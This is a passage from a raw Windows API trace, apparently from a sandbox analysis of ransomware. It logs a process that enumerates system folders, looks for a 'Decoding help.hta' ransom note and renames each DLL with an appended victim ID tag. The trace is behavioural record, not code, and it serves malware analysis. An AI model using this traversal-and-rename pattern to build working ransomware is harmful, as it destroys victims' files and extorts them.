lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.005] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadds.dll") returned -1 [0059.005] lstrlenW (lpString="msadds.dll") returned 10 [0059.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msadds.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" [0059.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" [0059.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.006] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfce53b36, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfce53b36, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80fc2d90, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0059.006] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.006] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.006] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msaddsr.dll") returned -1 [0059.006] lstrlenW (lpString="msaddsr.dll") returned 11 [0059.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.006] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msaddsr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" [0059.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" [0059.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.006] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7d9276, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd7d9276, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x81dbdf30, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0059.006] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.006] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.006] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.007] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaprsr.dll") returned -1 [0059.007] lstrlenW (lpString="msdaprsr.dll") returned 12 [0059.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.007] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.007] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msdaprsr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" [0059.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" [0059.007] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.007] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d295c, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc0d295c, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3497fc70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0059.008] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.008] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.008] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.008] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaprst.dll") returned -1 [0059.008] lstrlenW (lpString="msdaprst.dll") returned 12 [0059.008] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.008] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msdaprst.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" [0059.008] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" [0059.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.008] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93fdbb10, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93fdbb10, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x94001c70, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0059.008] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.008] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.008] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.008] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdarem.dll") returned -1 [0059.008] lstrlenW (lpString="msdarem.dll") returned 11 [0059.008] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.009] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msdarem.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" [0059.009] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" [0059.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.009] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6a878e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd6a878e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x835d7620, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 [0059.009] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.009] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.009] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaremr.dll") returned -1 [0059.009] lstrlenW (lpString="msdaremr.dll") returned 12 [0059.009] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.009] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msdaremr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" [0059.009] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" [0059.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.010] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0059.010] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.010] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0059.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0059.010] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdfmap.dll") returned -1 [0059.010] lstrlenW (lpString="msdfmap.dll") returned 11 [0059.010] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0059.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0059.010] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="msdfmap.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" [0059.010] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" [0059.010] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.011] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0059.011] FindClose (in: hFindFile=0x5e3530 | out: hFindFile=0x5e3530) returned 1 Thread: id = 435 os_tid = 0xbe0 [0044.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*", lpFindFileData=0x1c6dfd30 | out: lpFindFileData=0x1c6dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da638 [0044.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.309] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c6dfd30 | out: lpFindFileData=0x1c6dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.309] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.309] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c6dfd30 | out: lpFindFileData=0x1c6dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0044.309] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0044.309] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0044.309] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0044.309] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*" [0044.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*") returned 51 [0044.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033" [0044.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*" [0044.309] GlobalMemoryStatus (in: lpBuffer=0x1c6dfd10 | out: lpBuffer=0x1c6dfd10) [0044.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9400458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0044.310] CloseHandle (hObject=0x704) returned 1 [0044.310] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c6dfd30 | out: lpFindFileData=0x1c6dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, 